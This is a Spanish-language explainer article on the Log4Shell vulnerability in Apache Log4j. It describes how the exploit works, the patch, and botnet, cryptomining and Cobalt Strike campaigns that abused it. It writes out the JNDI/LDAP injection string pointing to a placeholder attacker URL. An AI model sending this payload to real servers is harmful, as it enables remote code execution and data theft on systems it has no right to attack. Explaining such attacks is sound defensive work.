Log4Shell Vulnerability
El 10 de diciembre de 2021, se lanzó un exploit para una vulnerabilidad crítica en la plataforma de registro Apache Log4j basada en Java.en público. Rastreada como CVE-2021-44228 o Log4Shell, la vulnerabilidad afecta las versiones de Log4j desde Log4j 2.0-beta9 y hasta 2.14.1. Los actores de amenazas pueden aprovechar el exploit para establecer un acceso remoto no autenticado, ejecutar código, entregar amenazas de malware o recopilar información. A la vulnerabilidad se le asigna un estado crítico ya que Log4j es ampliamente utilizado por aplicaciones empresariales y servicios en la nube.
Detalles técnicos de Log4Shell
El exploit comienza cuando el actor de amenazas cambia el agente de usuario de su navegador web. Luego visitan un sitio o buscan una cadena específica presente en sitios web con el formato:
$ {jndi: ldap: // [URL_atacante]}
Como resultado, la cadena se agregará a los registros de acceso del servidor web. Luego, los atacantes esperan a que la aplicación Log4j analice estos registros y llegue a la cadena adjunta. En este caso, el error se activará y hará que el servidor devuelva la llamada a la URL presente en la cadena JNDI. Se abusa de esa URL para manejar comandos codificados en Base64 o clases Javaposteriormente y ejecutarlos en el dispositivo comprometido.
Apache lanzó rápidamente una nueva versión, Log4j 2.15.0, para abordar y corregir el exploit, pero una cantidad significativa de sistemas vulnerables podrían permanecer sin parchear durante un período prolongado. Al mismo tiempo, los actores de amenazas se dieron cuenta rápidamente de la vulnerabilidad de día cero de Log4Shell y comenzaron a buscar servidores adecuados para explotar. La comunidad de infosec ha rastreado numerosas campañas de ataque que emplean Log4Shell para ofrecer una amplia gama de amenazas de malware.
Log4Shell se utiliza en ataques de recopilación de datos, redes de bots y criptomonedas
Uno de los primeros actores de amenazas en implementar Log4Shell en sus operaciones fueron los ciberdelincuentes detrás de la botnet de cripto minería Kinsing. Los piratas informáticos utilizaron Log4Shell para entregar cargas útiles codificadas en Base64 y ejecutar scripts de shell. La función de estos scripts es limpiar el sistema de destino de las amenazas de la minería criptográfica competidoras antes de que se ejecute su propio malware Kinsing.
Netlab 360 detectó a los actores de amenazas que usaban la vulnerabilidad para instalar versiones de las botnets Mirai y Muhstik en los dispositivos violados. Estas amenazas de malware están diseñadas para agregar sistemas infectados a una red de dispositivos y servidores de IoT, que los atacantes pueden instruir para que lancen ataques DDoS (denegación de servicio distribuida) o implementen cripto-mineros.después.
Según el Centro de Inteligencia de Amenazas de Microsoft, el exploit Log4j también fue blanco de campañas de ataque que lanzaron balizas Cobalt Strike. Cobalt Strike es una herramienta de software legítima que se utiliza para realizar pruebas de penetración en los sistemas de seguridad de una empresa.Sin embargo, sus capacidades de puerta trasera lo han convertido en una parte común del arsenal de numerosos grupos de actores de amenazas. Posteriormente, el acceso ilegal por la puerta trasera a la red de la víctima se utiliza para entregar cargas útiles de la siguiente etapa, como ransomware, ladrones de información y otras amenazas de malware.
Log4Shell puede explotarse para adquirir variables de entorno que contengan datos del servidor. De esta manera, los atacantes pueden obtener acceso al nombre del host, el nombre del sistema operativo, el número de versión del sistema operativo, el nombre de usuario bajo el cual se ejecuta el servicio Log4j y más.
